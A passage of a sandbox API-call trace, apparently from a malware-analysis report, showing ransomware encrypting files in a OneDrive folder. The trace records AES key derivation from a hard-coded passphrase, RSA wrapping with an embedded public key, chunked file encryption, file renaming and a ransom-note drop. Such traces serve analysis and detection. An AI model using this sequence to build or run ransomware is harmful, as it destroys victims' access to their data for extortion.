(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bg\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0273.207] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bg\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bg\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0273.209] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0273.209] CryptDestroyKey (hKey=0x2facc8) returned 1 [0273.209] CryptReleaseContext (hProv=0x2f295b8, dwFlags=0x0) returned 1 [0273.209] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0273.209] FindClose (in: hFindFile=0x2fa748 | out: hFindFile=0x2fa748) returned 1 [0273.209] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bg\\readme_back_files.htm")) returned 0xffffffff [0273.209] AreFileApisANSI () returned 1 [0273.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0273.209] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bg\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0273.210] GetFileType (hFile=0x5d3c) returned 0x1 [0273.210] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0273.212] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0273.212] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0273.212] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.212] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.212] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0273.212] GetLastError () returned 0x0 [0273.212] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-bd\\filesync.localizedresources.dll.mui")) returned 0x20 [0273.213] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0273.214] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-bd\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0273.215] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-bd\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0273.217] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0273.218] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f28e48) returned 1 [0273.220] CryptCreateHash (in: hProv=0x2f28e48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0273.220] lstrlenA (lpString="VjnQjmgTDrnneBnnDhUveiykzMlQm") returned 29 [0273.220] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0273.220] CryptDeriveKey (in: hProv=0x2f28e48, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb108) returned 1 [0273.220] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0273.220] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0273.220] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f29b08) returned 1 [0273.221] CryptImportPublicKeyInfo (in: hCryptProv=0x2f29b08, dwCertEncodingType=0x1, pInfo=0x2f33540*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33570*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33578*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2facc8) returned 1 [0273.221] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0273.221] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29b90*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f29b90*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0273.221] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f29b90*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f29b90*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0273.222] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.237] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.237] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.255] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.255] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.255] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.255] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.256] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.256] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.256] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.256] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.256] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.256] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.256] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.257] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.257] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.257] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.257] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.257] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.257] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.257] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.257] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.257] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.257] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.257] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.257] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.257] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.257] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.257] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.257] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.258] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.258] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.258] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.258] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.258] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.258] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.258] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.258] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.258] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.258] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.258] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.258] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.258] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.258] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.259] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.259] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.259] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.259] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.259] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.259] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.259] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.259] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.259] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.259] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.259] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.259] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.259] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.259] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.260] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.260] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.260] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.260] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.260] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.260] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.260] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.260] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.260] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.260] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.260] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.260] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 